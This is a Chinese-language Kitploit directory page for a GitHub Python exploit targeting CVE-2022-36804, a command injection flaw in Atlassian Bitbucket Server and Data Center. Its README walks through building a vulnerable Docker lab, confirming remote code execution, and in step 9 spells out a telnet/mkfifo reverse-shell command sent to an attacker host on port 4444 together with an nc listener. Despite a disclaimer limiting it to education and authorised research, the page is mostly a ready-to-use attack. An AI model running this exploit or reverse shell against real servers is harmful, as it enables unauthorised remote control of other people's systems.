Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-36804 — 针对CVE-2022-36804的Python漏洞利用,这是Atlassian Bitbucket Server和Data Center中的命令注入漏洞,允许具有读取权限的用户实现远程代码执行。 | Kitploit
工具/GitHubGitHub/asepsaepdin/cve-2022-36804
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

针对CVE-2022-36804的Python漏洞利用,这是Atlassian Bitbucket Server和Data Center中的命令注入漏洞,允许具有读取权限的用户实现远程代码执行。

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-36804 - Atlassian Bitbucket Server 与 Data Center 命令注入漏洞

Python


⚠️ 仅供教育和授权安全研究使用

原始漏洞利用作者

非常感谢原始 PoC 作者 Walnut Security Services Pvt. Ltd

描述

Atlassian Bitbucket Server 与 Data Center 的多个 API 端点(版本 7.0.0 至 7.6.17 之前、7.7.0 至 7.17.10 之前、7.18.0 至 7.21.4 之前、8.0.0 至 8.0.3 之前、8.1.0 至 8.1.3 之前、8.2.0 至 8.2.2 之前,以及 8.3.0 至 8.3.1 之前)允许具有公共或私有 Bitbucket 仓库读取权限的远程攻击者通过发送恶意的 HTTP 请求来执行任意代码。此漏洞由 TheGrandPew 通过我们的漏洞奖励计划报告。


步骤指南

  1. 首先,克隆仓库

    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. 切换目录

    cd CVE-2022-36804
    
  3. 构建漏洞容器

    docker build -t CVE-2022-36804 .
    
  4. 运行临时容器

    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. 检查容器 IP 地址

    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. 设置 Atlassian Bitbucket 并通过 URL http://172.17.0.3:7990 创建新的公共仓库

  7. 检查远程代码执行(RCE)

    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. 使用自定义命令(cmd)检查 RCE

    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. 从攻击者的角度来看,远程代码执行对于获取交互式 shell 至关重要。因此,执行以下命令将触发基于 bash 的 telnet 反向 shell,通过 tcp 连接到攻击者系统的 4444/tcp 端口:

    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    
    nc -nlvp 4444
    

致谢

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
下载工具